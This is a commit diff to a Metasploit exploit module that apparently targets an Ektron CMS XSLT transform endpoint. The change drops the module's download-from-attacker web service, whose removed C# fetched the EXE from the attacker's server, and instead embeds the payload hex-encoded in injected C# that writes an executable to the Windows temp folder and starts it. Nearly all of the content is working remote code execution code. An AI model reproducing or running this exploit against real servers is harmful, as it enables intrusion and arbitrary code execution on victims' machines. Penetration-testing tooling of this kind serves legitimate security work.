embeding payload on the c# script
jvazquez-r7
parent
3f3bdb8473
commit
5548bebb16
|
|
@ -11,7 +11,6 @@ require 'msf/core/exploit/file_dropper'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
|
@ -132,36 +131,6 @@ return "#{fingerprint}";
|
|||
|
||||
end
|
||||
|
||||
|
||||
# Handle incoming requests from the target
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
if (not @exe_data)
|
||||
print_error("A request came in, but the EXE archive wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.txt/
|
||||
print_good("Sending the EXE payload to the target...")
|
||||
send_response(cli, @exe_data)
|
||||
@exe_sent = true
|
||||
else
|
||||
# Don't know the request, return not found
|
||||
print_error("Don't care about this file, 404")
|
||||
send_not_found(cli)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def lookup_lhost()
|
||||
# Get the source address
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
datastore['SRVHOST']
|
||||
end
|
||||
end
|
||||
|
||||
def uri_path
|
||||
uri_path = target_uri.path
|
||||
uri_path << "/" if uri_path[-1, 1] != "/"
|
||||
|
|
@ -183,15 +152,12 @@ return "#{fingerprint}";
|
|||
end
|
||||
|
||||
def exploit
|
||||
print_status("Generating the EXE Payload...")
|
||||
@exe_data = generate_payload_exe
|
||||
exename = rand_text_alpha(5 + rand(5))
|
||||
resource_exe_uri = '/' + exename + '.txt'
|
||||
service_exe = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_exe_uri}"
|
||||
|
||||
print_status("Generating the XSLT...")
|
||||
print_status("Generating the EXE Payload and the XSLT...")
|
||||
exe_data = generate_payload_exe
|
||||
exe_string = Rex::Text.to_hex(exe_data)
|
||||
exename = rand_text_alpha(5 + rand(5))
|
||||
fingerprint = rand_text_alpha(5 + rand(5))
|
||||
payload_filename = rand_text_alpha(5 + rand(5))
|
||||
xslt_data = <<-XSLT
|
||||
<?xml version='1.0'?>
|
||||
<xsl:stylesheet version="1.0"
|
||||
|
|
@ -202,12 +168,20 @@ xmlns:user="http://mycompany.com/mynamespace">
|
|||
<![CDATA[
|
||||
public string xml()
|
||||
{
|
||||
System.Net.WebClient client = new System.Net.WebClient();
|
||||
client.DownloadFile(@"#{service_exe}", @"C:\\windows\\TEMP\\#{payload_filename}.txt");
|
||||
char[] charData = "#{exe_string}".ToCharArray();
|
||||
string fileName = @"C:\\windows\\temp\\#{exename}.txt";
|
||||
System.IO.FileStream fs = new System.IO.FileStream(fileName, System.IO.FileMode.Create);
|
||||
System.IO.BinaryWriter bw = new System.IO.BinaryWriter(fs);
|
||||
for (int i = 0; i < charData.Length; i++)
|
||||
{
|
||||
bw.Write( (byte) charData[i]);
|
||||
}
|
||||
bw.Close();
|
||||
fs.Close();
|
||||
System.Diagnostics.Process p = new System.Diagnostics.Process();
|
||||
p.StartInfo.UseShellExecute = false;
|
||||
p.StartInfo.RedirectStandardOutput = true;
|
||||
p.StartInfo.FileName = @"C:\\windows\\TEMP\\#{payload_filename}.txt";
|
||||
p.StartInfo.FileName = @"C:\\windows\\temp\\#{exename}.txt";
|
||||
p.Start();
|
||||
return "#{fingerprint}";
|
||||
}
|
||||
|
|
@ -218,30 +192,8 @@ return "#{fingerprint}";
|
|||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
XSLT
|
||||
register_file_for_cleanup("#{payload_filename}.txt")
|
||||
|
||||
print_status("Setting up the Web Service...")
|
||||
|
||||
ssl_option = nil
|
||||
if datastore['SSL']
|
||||
ssl_option = datastore['SSL']
|
||||
datastore['SSL'] = false
|
||||
end
|
||||
|
||||
print_status("Starting up our web service on #{service_exe} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => resource_exe_uri
|
||||
}})
|
||||
|
||||
if ssl_option
|
||||
datastore['SSL'] = ssl_option
|
||||
end
|
||||
|
||||
print_status("Trying to run the xslt transformation...")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",
|
||||
|
|
@ -254,32 +206,14 @@ return "#{fingerprint}";
|
|||
'vars_post' => {
|
||||
"xml" => rand_text_alpha(5 + rand(5)),
|
||||
"xslt" => xslt_data
|
||||
},
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
|
||||
print_good("Exploitation was successful")
|
||||
register_file_for_cleanup("#{exename}.txt")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "There was an unexpected response to the xslt transformation request")
|
||||
end
|
||||
|
||||
# wait for the data to be sent
|
||||
print_status("Waiting for the victim to request the EXE payload...")
|
||||
|
||||
waited = 0
|
||||
while (not @exe_sent)
|
||||
select(nil, nil, nil, 1)
|
||||
waited += 1
|
||||
if (waited > datastore['HTTP_DELAY'])
|
||||
fail_with(Exploit::Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Giving time to the payload to execute...")
|
||||
select(nil, nil, nil, 20)
|
||||
|
||||
print_status("Shutting down the web service...")
|
||||
stop_service
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue